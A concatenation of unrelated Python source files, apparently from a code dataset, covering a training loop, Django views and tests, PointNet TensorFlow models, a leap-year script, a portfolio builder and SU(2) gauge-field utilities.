acc_check = (acc_frequency is not None and it % acc_frequency == 0)
if first_it or epoch_end or acc_check:
if it > 0 and epoch_end:
# decay the learning rate
learning_rate *= learning_rate_decay
epoch += 1
# evaluate train accuracy
if N > 1000:
train_mask = np.random.choice(N, 1000)
X_train_subset = X[train_mask]
y_train_subset = y[train_mask]
else:
X_train_subset = X
y_train_subset = y
scores_train = loss_function(X_train_subset, model)
y_pred_train = np.argmax(scores_train, axis=1)
train_acc = np.mean(y_pred_train == y_train_subset)
train_acc_history.append(train_acc)
# evaluate val accuracy
scores_val = loss_function(X_val, model)
y_pred_val = np.argmax(scores_val, axis=1)
val_acc = np.mean(y_pred_val == y_val)
val_acc_history.append(val_acc)
# keep track of the best model based on validation accuracy
if val_acc > best_val_acc:
# make a copy of the model
best_val_acc = val_acc
best_model = {}
for p in model:
best_model[p] = model[p].copy()
# print progress if needed
if verbose:
print ('Finished epoch %d / %d: cost %f, train: %f, val %f, lr %e'
% (epoch, num_epochs, cost, train_acc, val_acc, learning_rate))
if verbose:
print 'finished optimization. best validation accuracy: %f' % (best_val_acc, )
# return the best model and the training history statistics
return best_model, loss_history, train_acc_history, val_acc_history
|
py | 1a347c1cbd1cb2af6def6f2cee6c1b5847c3d86e | from django.conf.urls import url
from .views import (
semseterResultxlsx,
)
urlpatterns=[
url(r'^semester-xlsx/(?P<collegeCode>\d+)/(?P<branchCode>\d+)/(?P<yearOfJoining>\d+)/(?P<semester>\d+)/$',semseterResultxlsx,name='semseterResultxlsx')
]
|
py | 1a347c3f195b406cd6fa9aad3c50d431c9f71ec4 | import bisect
from functools import total_ordering
from django.core.management import BaseCommand
from classification.enums import SpecialEKeys
from classification.models import Classification
@total_ordering
class ConversionSize:
def __init__(self, vc: Classification):
self.ref_length = vc.update_cached_c_hgvs()
self.vc_id = vc.id
self.chgvs = vc.get(SpecialEKeys.C_HGVS)
vc.save()
def __lt__(self, other):
return self.ref_length < other.ref_length
class Command(BaseCommand):
def handle(self, *args, **options):
conversions = list()
update_count = 0
for vc in Classification.objects.all():
conversion = ConversionSize(vc)
bisect.insort(conversions, conversion)
if len(conversions) > 10:
conversions.pop(0)
update_count += 1
if update_count % 100 == 0:
print(f"Completed {update_count}")
print(f"Bulk Update of Cached c.hgvs - completed")
print(f"Biggest ref lengths are:")
for conversion in conversions[::-1]:
print(f"{conversion.ref_length} from vc.id {conversion.vc_id} {conversion.chgvs}")
|
py | 1a347c472675485c21379af22928a5a05067bccb | # Copyright 2021 VMware, Inc.
# SPDX-License-Identifier: BSD-2
import functools
import json
import textwrap
import unittest
from typing import List
from typing import Tuple
import ddt
import mock
from tau_clients import decoders
from tau_clients import exceptions
TEST_SHA1_1 = "a" * 40
TEST_SHA1_2 = "b" * 40
TEST_UUID_1 = "2f945319183a004000f0486eb8aab782"
@ddt.ddt
class DecoderTestCase(unittest.TestCase):
"""Test the decoder."""
@staticmethod
def _side_effect_walk(
path: str,
existing_path: str,
existing_files: List[str],
) -> List[Tuple[str, None, List[str]]]:
"""
Side-effect returning a list of existing file if the path matches the existing path.
:param str path: the path
:param str existing_path: the path flagged as existing
:param list[str] existing_files: the existing files to be returned
:rtype: tuple(str, None, list[str])
:return: the mocked walk
"""
if path in existing_path:
return [(path, None, existing_files)]
else:
return []
@staticmethod
def _side_effect_exists(path: str, existing_paths: List[str]) -> bool:
"""
Side-effect returning whether something exists.
:param str path: the path
:param str existing_paths: the list of existing paths
:rtype: bool
:return: the mocked exist
"""
if path in existing_paths:
return True
else:
return False
@ddt.data(
([TEST_SHA1_1, TEST_SHA1_2], decoders.InputType.FILE_HASH),
([TEST_UUID_1], decoders.InputType.TASK_UUID),
)
def test_decode_input(self, args):
"""Test the decoder when parsing command line."""
arguments, expected_type = args
decoder = decoders.InputTypeDecoder()
input_bits, input_type = decoder.decode(
input_type=None,
arguments=arguments,
inspect_content=False,
)
self.assertEqual(input_type, expected_type)
self.assertEqual(input_bits, arguments)
# try again with no hint, we should get the same results
input_bits, input_type = decoder.decode(
input_type=expected_type,
arguments=arguments,
inspect_content=False,
)
self.assertEqual(input_type, expected_type)
self.assertEqual(input_bits, arguments)
@ddt.data(
([TEST_SHA1_1, TEST_SHA1_2], decoders.InputType.FILE_HASH),
([TEST_UUID_1], decoders.InputType.TASK_UUID),
)
def test_decode_input__inspect(self, args):
"""Test the decoder when parsing command line and we say to inspect files (weird)."""
arguments, expected_type = args
decoder = decoders.InputTypeDecoder()
input_bits, input_type = decoder.decode(
input_type=None,
arguments=arguments,
inspect_content=True,
)
self.assertEqual(input_type, expected_type)
self.assertEqual(input_bits, arguments)
# try again with no hint, we should get the same results
input_bits, input_type = decoder.decode(
input_type=expected_type,
arguments=arguments,
inspect_content=True,
)
self.assertEqual(input_type, expected_type)
self.assertEqual(input_bits, arguments)
def test_decode_input__multiple(self):
"""Test the decoder when parsing files but the arguments have different types."""
decoder = decoders.InputTypeDecoder()
with mock.patch("os.path.isfile") as mock_file:
mock_file.side_effect = functools.partial(
self._side_effect_exists,
existing_paths=["path/to/open"],
)
with self.assertRaisesRegexp(exceptions.InputTypeException, "Could not choose"):
_, _ = decoder.decode(
input_type=None,
arguments=["path/to/open", TEST_SHA1_1],
inspect_content=False,
)
# try again with no hint and we should see no difference
with self.assertRaisesRegexp(exceptions.InputTypeException, "Could not choose"):
_, _ = decoder.decode(
input_type=decoders.InputType.FILE_HASH,
arguments=["path/to/open", TEST_SHA1_1],
inspect_content=False,
)
@ddt.data(
# JSON
(json.dumps([TEST_SHA1_1]), [TEST_SHA1_1]),
(json.dumps([{"sha1": TEST_SHA1_1}]), [TEST_SHA1_1]),
(json.dumps([{"file_sha1": TEST_SHA1_1}]), [TEST_SHA1_1]),
(json.dumps([{"file_md5": TEST_SHA1_2, "file_sha1": TEST_SHA1_1}]), [TEST_SHA1_1]),
(json.dumps([{"file_md5": TEST_SHA1_1}]), [TEST_SHA1_1]),
# CSV
(
textwrap.dedent(
f"""
label1,file_sha1
data,{TEST_SHA1_1}
"""
).strip(),
[TEST_SHA1_1],
),
# PLAIN TEXT
(
textwrap.dedent(
f"""
{TEST_SHA1_1}
{TEST_SHA1_2}
"""
).strip(),
[TEST_SHA1_1, TEST_SHA1_2],
),
)
def test_decode_input__file(self, args):
"""Test the decoder when parsing files."""
test_data, expected_result = args
decoder = decoders.InputTypeDecoder()
with mock.patch("builtins.open", mock.mock_open(read_data=test_data)) as mock_file:
input_bits, input_type = decoder.decode(
input_type=decoders.InputType.FILE,
arguments=["path/to/open"],
inspect_content=True,
)
mock_file.assert_called_with("path/to/open", "r")
self.assertEqual(input_type, decoders.InputType.FILE_HASH)
self.assertEqual(input_bits, expected_result)
# try again with no hint and the only difference is that we test a file for existence
with mock.patch("os.path.isfile") as mock_file_2:
def side_effect(filename):
if filename == "path/to/open":
return True
else:
return False
mock_file_2.side_effect = side_effect
input_bits, input_type = decoder.decode(
input_type=None,
arguments=["path/to/open"],
inspect_content=True,
)
mock_file.assert_called_with("path/to/open", "r")
self.assertEqual(input_type, decoders.InputType.FILE_HASH)
self.assertEqual(input_bits, expected_result)
def test_decode_input__file__no_inspect(self):
"""Test the decoder when parsing files but we give up inspecting."""
decoder = decoders.InputTypeDecoder()
with mock.patch("os.path.isfile") as mock_file:
mock_file.side_effect = functools.partial(
self._side_effect_exists,
existing_paths=["path/to/open"],
)
input_bits, input_type = decoder.decode(
input_type=decoders.InputType.FILE,
arguments=["path/to/open"],
inspect_content=False,
)
self.assertEqual(input_type, decoders.InputType.FILE)
self.assertEqual(input_bits, ["path/to/open"])
# try again with no hint and we should see no difference
input_bits, input_type = decoder.decode(
input_type=None,
arguments=["path/to/open"],
inspect_content=False,
)
self.assertEqual(input_type, decoders.InputType.FILE)
self.assertEqual(input_bits, ["path/to/open"])
def test_decode_input__directory(self):
"""Test the decoder when parsing a directory."""
decoder = decoders.InputTypeDecoder()
with mock.patch("os.path.isdir") as mock_dir:
with mock.patch("os.walk") as mock_walk:
with mock.patch("os.path.isfile") as mock_file:
mock_dir.side_effect = functools.partial(
self._side_effect_exists, existing_paths=["path/to/list"]
)
mock_walk.side_effect = functools.partial(
self._side_effect_walk,
existing_path="path/to/list",
existing_files=["a", "b"],
)
mock_file.side_effect = functools.partial(
self._side_effect_exists,
existing_paths=["path/to/list/a", "path/to/list/b"],
)
input_bits, input_type = decoder.decode(
input_type=decoders.InputType.DIRECTORY,
arguments=["path/to/list"],
inspect_content=False,
)
self.assertEqual(input_type, decoders.InputType.FILE)
self.assertEqual(input_bits, ["path/to/list/a", "path/to/list/b"])
# try again with no hint but we should see no difference
input_bits, input_type = decoder.decode(
input_type=None,
arguments=["path/to/list"],
inspect_content=False,
)
self.assertEqual(input_type, decoders.InputType.FILE)
self.assertEqual(input_bits, ["path/to/list/a", "path/to/list/b"])
def test_decode_input__directory__empty(self):
"""Test the decoder when parsing an empty directory."""
decoder = decoders.InputTypeDecoder()
with mock.patch("os.path.isdir") as mock_dir:
with mock.patch("os.walk") as mock_walk:
mock_dir.side_effect = functools.partial(
self._side_effect_exists, existing_paths=["path/to/list"]
)
mock_walk.side_effect = functools.partial(
self._side_effect_walk,
existing_path="path/to/list",
existing_files=[],
)
with self.assertRaisesRegexp(exceptions.InputTypeException, "Could not infer"):
_, _ = decoder.decode(
input_type=decoders.InputType.DIRECTORY,
arguments=["path/to/list"],
inspect_content=False,
)
# try again with no hint but we should see no difference
with self.assertRaisesRegexp(exceptions.InputTypeException, "Could not infer"):
_, _ = decoder.decode(
input_type=None,
arguments=["path/to/list"],
inspect_content=False,
)
@ddt.data(
# JSON
(json.dumps([]), []),
(json.dumps([{"file_md4": TEST_SHA1_1}]), []),
# CSV
(
textwrap.dedent(
"""
label1,file_sha1
"""
).strip(),
[],
),
(
textwrap.dedent(
"""
label1,file_md5
"""
).strip(),
[],
),
# PLAIN TEXT
(
textwrap.dedent(
"""
test1
test2
"""
).strip(),
[],
),
)
def test_decode_input__file__empty(self, args):
"""Test the decoder when parsing empty files."""
test_data, expected_result = args
decoder = decoders.InputTypeDecoder()
with mock.patch("builtins.open", mock.mock_open(read_data=test_data)) as _:
with self.assertRaisesRegexp(exceptions.InputTypeException, "Could not decode"):
_, _ = decoder.decode(
input_type=decoders.InputType.FILE,
arguments=["path/to/open"],
inspect_content=True,
)
# try again with no hint but we should see no difference
with self.assertRaisesRegexp(exceptions.InputTypeException, "Could not infer"):
_, _ = decoder.decode(
input_type=None,
arguments=["path/to/open"],
inspect_content=True,
)
def test_decode_input__file__no_inspect__empty(self):
"""Test the decoder when parsing empty files and give up inspecting."""
decoder = decoders.InputTypeDecoder()
with mock.patch("os.path.isfile") as mock_file:
mock_file.side_effect = functools.partial(
self._side_effect_exists,
existing_paths=[],
)
with self.assertRaisesRegexp(exceptions.InputTypeException, "Could not infer"):
_, _ = decoder.decode(
input_type=decoders.InputType.FILE,
arguments=["path/to/open"],
inspect_content=False,
)
# try again with no hint but we should see no difference
with self.assertRaisesRegexp(exceptions.InputTypeException, "Could not infer"):
_, _ = decoder.decode(
input_type=None,
arguments=["path/to/open"],
inspect_content=False,
)
|
py | 1a347e1de60a669faaf9a22c110867c191317edf | import tensorflow as tf
import numpy as np
import math
import sys
import os
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(BASE_DIR)
sys.path.append(os.path.join(BASE_DIR, '../utils'))
import tensorflow as tf
import tf_util
from transform_nets import input_transform_net, feature_transform_net
import pyramid_nets
def placeholder_inputs(batch_size, num_point):
pointclouds_pl = tf.placeholder(tf.float32,
shape=(batch_size, num_point, 3))
labels_pl = tf.placeholder(tf.int32,
shape=(batch_size, num_point))
return pointclouds_pl, labels_pl
def placeholder_inputs_weight(batch_size, num_point):
pointclouds_pl = tf.placeholder(tf.float32, shape=(batch_size, num_point, 3))
labels_pl = tf.placeholder(tf.int32, shape=(batch_size, num_point))
smpws_pl = tf.placeholder(tf.float32, shape=(batch_size, num_point))
return pointclouds_pl, labels_pl, smpws_pl
def get_model(point_cloud, is_training, num_classes, bn_decay=None):
""" Classification PointNet, input is BxNx3, output BxNx50 """
batch_size = point_cloud.get_shape()[0].value
num_point = point_cloud.get_shape()[1].value
end_points = {}
with tf.variable_scope('transform_net1') as sc:
transform = input_transform_net(point_cloud, is_training, bn_decay, K=3)
point_cloud_transformed = tf.matmul(point_cloud, transform)
input_image = tf.expand_dims(point_cloud_transformed, -1)
net = tf_util.conv2d(input_image, 64, [1,3],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv1', bn_decay=bn_decay)
net = tf_util.conv2d(net, 64, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv2', bn_decay=bn_decay)
with tf.variable_scope('transform_net2') as sc:
transform = feature_transform_net(net, is_training, bn_decay, K=64)
end_points['transform'] = transform
net_transformed = tf.matmul(tf.squeeze(net, axis=[2]), transform)
point_feat = tf.expand_dims(net_transformed, [2])
print(point_feat)
net = tf_util.conv2d(point_feat, 64, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv3', bn_decay=bn_decay)
net = tf_util.conv2d(net, 128, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv4', bn_decay=bn_decay)
net = tf_util.conv2d(net, 128, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv5', bn_decay=bn_decay)
global_feat = tf_util.max_pool2d(net, [num_point,1],
padding='VALID', scope='maxpool')
print(global_feat)
global_feat_expand = tf.tile(global_feat, [1, num_point, 1, 1])
concat_feat = tf.concat([point_feat, global_feat_expand], 3)
print(concat_feat)
net = tf_util.conv2d(concat_feat, 256, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv6', bn_decay=bn_decay)
net = tf_util.conv2d(net, 256, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv7', bn_decay=bn_decay)
net = tf_util.conv2d(net, 128, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv8', bn_decay=bn_decay)
net = tf_util.conv2d(net, 128, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv9', bn_decay=bn_decay)
net = tf_util.conv2d(net, num_classes, [1,1],
padding='VALID', stride=[1,1], activation_fn=None,
scope='conv10')
net = tf.squeeze(net, [2]) # BxNxC
return net, end_points
def get_model_pyramid_fine_tune(pointnet_graph, point_cloud, point_coords_in_voxels, num_scale, is_training, num_classes, bn_decay=None):
""" Classification PointNet, input is BxNx3, output BxNx50 """
batch_size = point_cloud.get_shape()[0].value
num_point = point_cloud.get_shape()[1].value
end_points = {}
end_points['transform'] = pointnet_graph.get_tensor_by_name("transform_net2/Reshape_1:0")
points_feat1 = pointnet_graph.get_tensor_by_name("conv5/Relu:0")
print("points_feat1:", points_feat1)
# PYRAMID START #
# m x n x 1024
points_feat1 = tf.squeeze(points_feat1, [2])
print(points_feat1)
# m x n x (4 x 128 = 512)
points_feat1_concat = pyramid_nets.pyramid_convert_layer(points_feat1, point_coords_in_voxels, num_scale, [256], "Pyramid_1", bn=True, is_training = is_training, bn_decay = bn_decay)
print(points_feat1_concat)
# m x n x 1 x 512
points_feat1_concat = tf.expand_dims(points_feat1_concat, [2])
# Concat pyramid global and local features
points_feat1 = tf.expand_dims(points_feat1, [2])
point_feat_concat = tf.concat(axis=3, values=[points_feat1, points_feat1_concat])
# PYRAMID END #
net = tf_util.conv2d(point_feat_concat, 256, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv6_pyramid', bn_decay=bn_decay)
net = tf_util.conv2d(net, 256, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv7_pyramid', bn_decay=bn_decay)
net = tf_util.conv2d(net, 128, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv8_pyramid', bn_decay=bn_decay)
net = tf_util.conv2d(net, 128, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv9_pyramid', bn_decay=bn_decay)
net = tf_util.conv2d(net, num_classes, [1,1],
padding='VALID', stride=[1,1], activation_fn=None,
scope='conv10_pyramid')
net = tf.squeeze(net, [2]) # BxNxC
return net, end_points
def get_model_fine_tuing_evaluate(point_cloud, point_coords_in_voxels, num_scale, is_training, num_classes, bn_decay=None):
""" Classification PointNet, input is BxNx3, output BxNx50 """
batch_size = point_cloud.get_shape()[0].value
num_point = point_cloud.get_shape()[1].value
end_points = {}
with tf.variable_scope('transform_net1') as sc:
transform = input_transform_net(point_cloud, is_training, bn_decay, K=3)
point_cloud_transformed = tf.matmul(point_cloud, transform)
input_image = tf.expand_dims(point_cloud_transformed, -1)
net = tf_util.conv2d(input_image, 64, [1,3],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv1', bn_decay=bn_decay)
net = tf_util.conv2d(net, 64, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv2', bn_decay=bn_decay)
with tf.variable_scope('transform_net2') as sc:
transform = feature_transform_net(net, is_training, bn_decay, K=64)
end_points['transform'] = transform
net_transformed = tf.matmul(tf.squeeze(net, axis=[2]), transform)
point_feat = tf.expand_dims(net_transformed, [2])
print(point_feat)
net = tf_util.conv2d(point_feat, 64, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv3', bn_decay=bn_decay)
net = tf_util.conv2d(net, 128, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv4', bn_decay=bn_decay)
net = tf_util.conv2d(net, 128, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv5', bn_decay=bn_decay)
# PYRAMID START #
# m x n x 1024
net = tf.squeeze(net, [2])
print(net)
# m x n x (4 x 128 = 512)
points_feat1_concat = pyramid_nets.pyramid_convert_layer(net, point_coords_in_voxels, num_scale, [256], "Pyramid_1", bn=True, is_training = is_training, bn_decay = bn_decay)
print(points_feat1_concat)
# m x n x 1 x 512
points_feat1_concat = tf.expand_dims(points_feat1_concat, [2])
# Concat pyramid global and local features
net = tf.expand_dims(net, [2])
point_feat_concat = tf.concat(axis=3, values=[net, points_feat1_concat])
# PYRAMID END #
net = tf_util.conv2d(point_feat_concat, 256, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv6_pyramid', bn_decay=bn_decay)
net = tf_util.conv2d(net, 256, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv7_pyramid', bn_decay=bn_decay)
net = tf_util.conv2d(net, 128, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv8_pyramid', bn_decay=bn_decay)
net = tf_util.conv2d(net, 128, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv9_pyramid', bn_decay=bn_decay)
net = tf_util.conv2d(net, num_classes, [1,1],
padding='VALID', stride=[1,1], activation_fn=None,
scope='conv10_pyramid')
net = tf.squeeze(net, [2]) # BxNxC
return net, end_points
def get_model_multi_pyramid_fine_tune(pointnet_graph, point_cloud, point_coords_in_voxels, num_scale, is_training, num_classes, bn_decay=None):
""" Classification PointNet, input is BxNx3, output BxNx50 """
batch_size = point_cloud.get_shape()[0].value
num_point = point_cloud.get_shape()[1].value
end_points = {}
end_points['transform'] = pointnet_graph.get_tensor_by_name("transform_net2/Reshape_1:0")
points_feat1 = pointnet_graph.get_tensor_by_name("conv5/Relu:0")
print("points_feat1:", points_feat1)
# PYRAMID START #
# m x n x 1024
points_feat1 = tf.squeeze(points_feat1, [2])
print(points_feat1)
# m x n x (4 x 128 = 512)
points_feat1_concat = pyramid_nets.pyramid_convert_layer(points_feat1, point_coords_in_voxels, num_scale, [256], "Pyramid_1", bn=True, is_training = is_training, bn_decay = bn_decay)
print(points_feat1_concat)
# m x n x 1 x 512
points_feat1_concat = tf.expand_dims(points_feat1_concat, [2])
# Concat pyramid global and local features
points_feat1 = tf.expand_dims(points_feat1, [2])
point_feat_concat = tf.concat(axis=3, values=[points_feat1, points_feat1_concat])
# PYRAMID END #
net = tf_util.conv2d(point_feat_concat, 256, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv6_pyramid1', bn_decay=bn_decay)
net = tf_util.conv2d(net, 128, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv7_pyramid1', bn_decay=bn_decay)
points_feat2= net
# PYRAMID START #
# m x n x 1024
points_feat2 = tf.squeeze(points_feat2, [2])
print(points_feat2)
# m x n x (4 x 128 = 512)
points_feat1_concat2 = pyramid_nets.pyramid_convert_layer(points_feat2, point_coords_in_voxels, num_scale, [128], "Pyramid_2", bn=True, is_training = is_training, bn_decay = bn_decay)
print(points_feat1_concat2)
# m x n x 1 x 512
points_feat1_concat2 = tf.expand_dims(points_feat1_concat2, [2])
# Concat pyramid global and local features
points_feat2 = tf.expand_dims(points_feat2, [2])
point_feat_concat2 = tf.concat(axis=3, values=[points_feat2, points_feat1_concat2])
# PYRAMID END #
net = tf_util.conv2d(point_feat_concat2, 256, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv6_pyramid2', bn_decay=bn_decay)
net = tf_util.conv2d(net, 256, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv7_pyramid2', bn_decay=bn_decay)
net = tf_util.conv2d(net, 128, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv8_pyramid2', bn_decay=bn_decay)
net = tf_util.conv2d(net, 128, [1,1],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
scope='conv9_pyramid2', bn_decay=bn_decay)
net = tf_util.conv2d(net, num_classes, [1,1],
padding='VALID', stride=[1,1], activation_fn=None,
scope='conv10_pyramid')
net = tf.squeeze(net, [2]) # BxNxC
return net, end_points
def get_loss(pred, label, end_points, reg_weight=0.001):
""" pred: BxNxC,
label: BxN, """
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=pred, labels=label)
classify_loss = tf.reduce_mean(loss)
tf.scalar_summary('classify loss', classify_loss)
# Enforce the transformation as orthogonal matrix
transform = end_points['transform'] # BxKxK
K = transform.get_shape()[1].value
mat_diff = tf.matmul(transform, tf.transpose(transform, perm=[0,2,1]))
mat_diff -= tf.constant(np.eye(K), dtype=tf.float32)
mat_diff_loss = tf.nn.l2_loss(mat_diff)
tf.scalar_summary('mat_loss', mat_diff_loss)
return classify_loss + mat_diff_loss * reg_weight
def get_loss(pred, label, smpw, end_points):
""" pred: BxNxC,
label: BxN,
smpw: BxN """
classify_loss = tf.losses.sparse_softmax_cross_entropy(labels=label, logits=pred, weights=smpw)
tf.summary.scalar('classify loss', classify_loss)
tf.add_to_collection('losses', classify_loss)
return classify_loss
if __name__=='__main__':
with tf.Graph().as_default():
inputs = tf.zeros((32,1024,3))
outputs = get_model(inputs, tf.constant(True))
print(outputs)
|
py | 1a347eb33363b6cd606c90510b62b0758f55f4a4 | from datetime import date
print('ANO BISSEXTO')
ano = int(input('Digite um ano: '))
if ano == 0:
ano = date.today().year
if ano % 4 == 0 and ano % 100 != 0 or ano % 400 == 0:
print('É ano bissexto!')
else:
print('Não é ano bissexto!') |
py | 1a347ef518742a59be89302352511563234350ac | # -*- coding: utf-8 -*-
"""
Created on 2017-5-9
@author: cheng.li
"""
import numpy as np
from alphamind.utilities import group_mapping
from alphamind.utilities import simple_abssum
from alphamind.utilities import transform
def long_short_builder(er: np.ndarray,
leverage: float = 1.,
groups: np.ndarray = None,
masks: np.ndarray = None) -> np.ndarray:
er = er.copy()
if masks is not None:
er[masks] = 0.
er[~masks] = er[~masks] - er[~masks].mean()
if er.ndim == 1:
er = er.reshape((-1, 1))
if groups is None:
return er / simple_abssum(er, axis=0) * leverage
else:
groups = group_mapping(groups)
return transform(groups, er, 'scale', scale=leverage)
|
py | 1a347fbab992abc9d873866bd02f1fbff0f23b2d | """
Some tools to manipulate SU(2) gauge and adjoint scalar fields
"""
import tensorflow as tf
import numpy as np
# Generate Pauli matrices, using convention that 0th pauli matrix is the identity
def pauliMatrix(cpt):
if cpt == 0:
pauliMat = tf.constant([[1, 0], [0, 1]], dtype=tf.complex128)
elif cpt == 1:
pauliMat = tf.constant([[0, 1], [1, 0]], dtype=tf.complex128)
elif cpt == 2:
pauliMat = tf.constant([[0j, -1j], [1j, 0j]], dtype=tf.complex128)
elif cpt == 3:
pauliMat = tf.constant([[1, 0], [0, -1]], dtype=tf.complex128)
return pauliMat
# Generate an [N, N, N] field taking random values in the SU(2) Lie algebra.
def randomSu2LieAlgField(N):
matReal = tf.random.uniform([N, N, N, 2, 2], dtype=tf.float64)
matImag = tf.random.uniform([N, N, N, 2, 2], dtype=tf.float64)
mat = tf.complex(matReal, matImag)
trace = tf.linalg.trace(mat)
trace = tf.expand_dims(trace, -1)
trace = tf.expand_dims(trace, -1)
identity = tf.eye(2, batch_shape=[N, N, N], dtype=tf.complex128)
mat = mat - trace*identity
mat = 0.5*(mat + tf.linalg.adjoint(mat))
return mat
# Convert an [..., 3] vector field to an [..., 2, 2] field in the SU(2)
# Lie algebra. Equivalent to contraction with a vector field of Pauli matrices
def vecToSu2LieAlg(inputVectorField):
inputVectorField = tf.cast(inputVectorField, dtype=tf.complex128)
inputShape = tf.shape(inputVectorField)[0:-1]
outputShape = tf.concat([inputShape, [2, 2]], 0)
outputField = tf.zeros(outputShape, dtype=tf.complex128)
outputField += tf.expand_dims(
tf.expand_dims(inputVectorField[...,0], -1), -1
) * pauliMatrix(1)
outputField += tf.expand_dims(
tf.expand_dims(inputVectorField[...,1], -1), -1
) * pauliMatrix(2)
outputField += tf.expand_dims(
tf.expand_dims(inputVectorField[...,2], -1), -1
) * pauliMatrix(3)
return outputField
# Converts a [..., 3] vector field to a [..., 2, 2] SU(2) field
def vecToSu2(inputVectorField):
lieAlgField = vecToSu2LieAlg(inputVectorField)
return tf.linalg.expm(1j*lieAlgField)
# Converts a [..., 2, 2] SU(2) field to a [..., 3] SU(2) field
def su2ToVec(inputField):
latShape = tf.shape(inputField)[0:-2]
outputShape = tf.concat([latShape, [3]], 0)
zeroTol = 1e-15
cosVecNorm = 0.5*tf.math.real(tf.linalg.trace(inputField))
outputVec0 = tf.zeros(latShape, dtype=tf.float64)
outputVec1 = tf.zeros(latShape, dtype=tf.float64)
outputVec2 = tf.zeros(latShape, dtype=tf.float64)
vecNorm = tf.math.acos(cosVecNorm)
# This will clip vec values of +-pi to zero
outputVec0 = 0.5 * tf.math.divide_no_nan(vecNorm, tf.math.sin(vecNorm)) *\
tf.math.imag(tf.linalg.trace(inputField @ pauliMatrix(1)))
outputVec1 = 0.5 * tf.math.divide_no_nan(vecNorm, tf.math.sin(vecNorm)) *\
tf.math.imag(tf.linalg.trace(inputField @ pauliMatrix(2)))
outputVec2 = 0.5 * tf.math.divide_no_nan(vecNorm, tf.math.sin(vecNorm)) *\
tf.math.imag(tf.linalg.trace(inputField @ pauliMatrix(3)))
return tf.stack([outputVec0, outputVec1, outputVec2], -1)
# Sets initial conditions for a single monopole at the origin with twisted
# boundary conditions. X, Y, Z are rank-3 tensors formed as the output of
# meshgrid; note that 'ij' indexing must be used to keep X and Y in the correct
# order.
def setMonopoleInitialConditions(X, Y, Z, vev):
latSize = tf.shape(X)
r = tf.math.sqrt(X**2 + Y**2 + Z**2)
higgsX = vev / np.sqrt(2) * X / r
higgsY = vev / np.sqrt(2) * Y / r
higgsZ = vev / np.sqrt(2) * Z / r
scalarMat = vecToSu2LieAlg(tf.stack([higgsX, higgsY, higgsZ], -1))
zeroMat = tf.zeros(latSize, dtype=tf.float64)
gaugeVec0 = tf.stack([zeroMat, Z / r**2, -Y / r**2], -1)
gaugeVec1 = tf.stack([-Z / r**2, zeroMat, X / r**2], -1)
gaugeVec2 = tf.stack([Y / r**2, -X / r**2, zeroMat], -1)
gaugeMat0 = vecToSu2(gaugeVec0)
gaugeMat1 = vecToSu2(gaugeVec1)
gaugeMat2 = vecToSu2(gaugeVec2)
gaugeMat = tf.stack([gaugeMat0, gaugeMat1, gaugeMat2], axis=-3)
return scalarMat, gaugeMat
# Sets initial conditions for an Electroweak sphaleron at the origin with periodic
# boundary conditions. X, Y, Z are rank-3 tensors formed as the output of
# meshgrid; note that 'ij' indexing must be used to keep X and Y in the correct
# order.
def setSphaleronInitialConditions(X, Y, Z, vev, gaugeCouping):
latSize = tf.shape(X)
r = tf.math.sqrt(X**2 + Y**2 + Z**2)
zeroMat = tf.zeros(latSize, dtype=tf.float64)
gaugeFn = 1/tf.math.cosh(vev*gaugeCouping*r/3)
higgsFn = tf.cast(tf.math.tanh(vev*gaugeCouping*r/3), tf.complex128)
higgsMat = 1/np.sqrt(2) * vev * tf.ones(latSize, dtype=tf.complex128) * higgsFn
higgsMat = tf.expand_dims(higgsMat, -1)
higgsMat = tf.expand_dims(higgsMat, -1)
isospinVecX = tf.stack([zeroMat, Z / r**2 * gaugeFn, -Y / r**2 * gaugeFn], -1)
isospinVecY = tf.stack([-Z / r**2 * gaugeFn, zeroMat, X / r**2 * gaugeFn], -1)
isospinVecZ = tf.stack([Y / r**2 * gaugeFn, -X / r**2 * gaugeFn, zeroMat], -1)
isospinMatX = vecToSu2(isospinVecX)
isospinMatY = vecToSu2(isospinVecY)
isospinMatZ = vecToSu2(isospinVecZ)
isospinMat = tf.stack([isospinMatX, isospinMatY, isospinMatZ], axis=-3)
hyperchargeMat = tf.ones(latSize, dtype=tf.complex128)
hyperchargeMat = tf.expand_dims(hyperchargeMat, -1)
hyperchargeMat = tf.expand_dims(hyperchargeMat, -1)
